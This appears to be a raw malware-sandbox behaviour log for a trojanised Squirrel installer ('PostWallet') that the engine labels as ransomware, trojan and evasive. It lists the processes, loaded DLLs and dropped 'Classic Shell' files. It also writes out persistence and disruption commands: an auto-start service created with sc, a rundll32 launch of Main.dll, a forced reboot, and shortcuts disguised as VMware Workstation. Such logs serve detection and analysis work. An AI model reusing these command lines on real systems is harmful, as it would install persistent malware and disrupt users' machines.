          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe Code function: 4_2_00ED6EA0 memset,EnterCriticalSection,EnterCriticalSection,memcpy,LeaveCriticalSection,GetTokenInformation,GetLastError,Warning,GetTokenInformation,EqualSid,LeaveCriticalSection,Warning,Warning,free,free,DuplicateTokenEx,GetLastError,free,free,AllocateAndInitializeSid,GetLastError,Warning,SetTokenInformation,GetLastError,Warning,FreeSid,free,free,Warning,GetLastError,free,ImpersonateLoggedOnUser,GetLastError,Warning,GetLastError,free,_stricmp,free,free,Warning,Warning,CreateProcessAsUserW,free,free,GlobalMemoryStatusEx,GetLastError,free,free,SetProcessWorkingSetSize,GetLastError,ResumeThread,CloseHandle,free,free,GetLastError,GetCurrentProcess,IsWow64Process,GetTokenInformation,GetLastError,Warning,free,free,Warning,Warning,free,free,free,free,free,free,Warning,TerminateProcess,CloseHandle,CloseHandle,CloseHandle
          Source: 00023948209303294#U00ac320302282349843984903.exe Static PE information: Resource name: DATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: Windows Aero.skin.13.dr Static PE information: No import functions for PE file found
          Source: Metro.skin7.13.dr Static PE information: No import functions for PE file found
          Source: Midnight.skin7.13.dr Static PE information: No import functions for PE file found
          Source: Classic Skin.skin7.13.dr Static PE information: No import functions for PE file found
          Source: MsMpLics.dll.13.dr Static PE information: No import functions for PE file found
          Source: Windows XP Luna.skin.13.dr Static PE information: No import functions for PE file found
          Source: Metallic.skin7.13.dr Static PE information: No import functions for PE file found
          Source: Full Glass.skin.13.dr Static PE information: No import functions for PE file found
          Source: Smoked Glass.skin.13.dr Static PE information: No import functions for PE file found
          Source: Windows Aero.skin7.13.dr Static PE information: No import functions for PE file found
          Source: EppManifest.dll.13.dr Static PE information: No import functions for PE file found
          Source: Windows Basic.skin.13.dr Static PE information: No import functions for PE file found
          Source: Classic Skin.skin.13.dr Static PE information: No import functions for PE file found
          Source: Metro.skin.13.dr Static PE information: No import functions for PE file found
          Source: Windows 8.skin.13.dr Static PE information: No import functions for PE file found
          Source: Windows 8.skin7.13.dr Static PE information: No import functions for PE file found
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.2012350577.0000000001355000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.2012430471.0000000001360000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.2012350577.0000000001360000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.2012404028.0000000001360000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exe Binary or memory string: OriginalFilenameSetup.exe6 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: msvcp140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d9.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: msctfui.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vmwarebase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\shutdown.exeSection loaded: shutdownext.dllJump to behavior
          Source: C:\Windows\System32\shutdown.exeSection loaded: sspicli.dllJump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Windows Aero.skin.13.drStatic PE information: Section .rsrc
          Source: Metro.skin7.13.drStatic PE information: Section .rsrc
          Source: Midnight.skin7.13.drStatic PE information: Section .rsrc
          Source: Classic Skin.skin7.13.drStatic PE information: Section .rsrc
          Source: Windows XP Luna.skin.13.drStatic PE information: Section .rsrc
          Source: Metallic.skin7.13.drStatic PE information: Section .rsrc
          Source: Full Glass.skin.13.drStatic PE information: Section .rsrc
          Source: Smoked Glass.skin.13.drStatic PE information: Section .rsrc
          Source: Windows Aero.skin7.13.drStatic PE information: Section .rsrc
          Source: Windows Basic.skin.13.drStatic PE information: Section .rsrc
          Source: Classic Skin.skin.13.drStatic PE information: Section .rsrc
          Source: Metro.skin.13.drStatic PE information: Section .rsrc
          Source: Windows 8.skin.13.drStatic PE information: Section .rsrc
          Source: Windows 8.skin7.13.drStatic PE information: Section .rsrc
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: y.vBP
          Source: classification engineClassification label: mal80.rans.troj.evad.winEXE@24/60@1/1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED5EE0 Warning,Warning,strrchr,memset,GetModuleFileNameW,GetLastError,WSCSetApplicationCategory,WSCSetApplicationCategory,Warning,Warning,WSAStartup,WSAGetLastError,Warning,StartServiceCtrlDispatcherW,GetLastError,4_2_00ED5EE0
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic ShellJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWalletJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\.squirrel-lock-CAB1F1D4116D18BCC531A7BF44D3609DB185FAD9Jump to behavior
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: 00023948209303294#U00ac320302282349843984903.exeVirustotal: Detection: 8%
          Source: 00023948209303294#U00ac320302282349843984903.exeString found in binary or memory: DeploymentTool.exe\need dictionaryinvalid literal/length codeinvalid distance codeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid bit length repeatoversubscribed dynamic bit lengths treeincomplete dynamic bit lengths treeoversubscribed literal/length treeincomplete literal/length treeoversubscribed distance treeincomplete distance treeempty distance tree with lengthsunknown compression methodinvalid window sizeincorrect header checkincorrect data check\..\\..//..//..\UT%s%s%s%s%sOpen Setup LogCloseInstallation has failedSquirrelSQUIRREL_TEMP%s%s\%sUnable to write to %s - IT policies may be restricting access to this folder\SquirrelTemp%s\SquirrelSetup.logDATAUpdate.exe"%s" --install . %sThere was an error while installing the application. Check the setup log for more information and contact the author.Failed to extract installervector<T> too longi
          Source: Update.exeString found in binary or memory: b=|baseUrl={Provides a base URL to prefix the RELEASES file packages with-a=|process-start-args=iArguments that will be used when starting executable-l=|shortcut-locations=
          Source: Update.exeString found in binary or memory: ((?=^[ ]{{0,{0}}}[^ \t\n])|\Z) # Lookahead for non-space at line-start, or end of doc
          Source: Update.exeString found in binary or memory: onError%Downloading file: 1Failed downloading URL: #Downloading url: 1Failed to download url: !squirrel-install3Starting automatic update7Failed to check for updates5Failed to download updates/Failed to apply updates9Failed to set up uninstaller){0} {1}{2} {3} # {4}
          Source: Update.exeString found in binary or memory: Scanning {0}mIgnoring {0} as the target framework is not compatible%Writing {0} to {1}UCouldn't find file for package in {1}: {0}%--squirrel-install%--squirrel-updated'--squirrel-obsolete)--squirrel-uninstall'--squirrel-firstrunAFailed to handle Squirrel events[\StringFileInfo\040904B0\SquirrelAwareVersion)SquirrelAwareVersion;Failed to promote Tray icon:
          Source: Update.exeString found in binary or memory: ..\Update.exegUpdate.exe not found, not a Squirrel-installed app?
          Source: Update.exeString found in binary or memory: update.MNo release to install, running the appIFailed to install package to app dirIFailed to update local releases file;Failed to invoke post-install;Starting fixPinnedExecutables)Fixing up tray icons
          Source: Update.exeString found in binary or memory: -delta.nupkg$iCannot apply combinations of delta and full packagesQCouldn't run Squirrel hook, continuing: ---squirrel-updated {0}---squirrel-install {0}9Squirrel Enabled Apps: [{0}]wNo apps are marked as Squirrel-aware! Going to run them all-Failed to delete key: /--squirrel-obsolete {0}7Couldn't delete directory: QCoudln't run Squirrel hook, continuing: WcleanDeadVersions: checking for version {0}kcleanDeadVersions: exclude current version folder {0}ccleanDeadVersions: exclude new version folder {0}
          Source: unknownProcess created: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
          Source: unknownProcess created: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe "C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeProcess created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe"
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Windows\System32\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: VMware Workstation.lnk.3.drLNK file: ..\..\..\..\..\..\Local\PostWallet\FilePosta.exe
          Source: VMware Workstation.lnk0.3.drLNK file: ..\AppData\Local\PostWallet\FilePosta.exe
          Source: C:\Windows\System32\rundll32.exeFile written: C:\Program Files\Classic Shell\StartMenuHelperL10N.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic ShellJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\cacheJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zip1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\PolicyDefinitions.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\HISTORY.txtJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuHelperL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ExplorerL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\SkinsJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\IE Settings.lnkJump to behavior
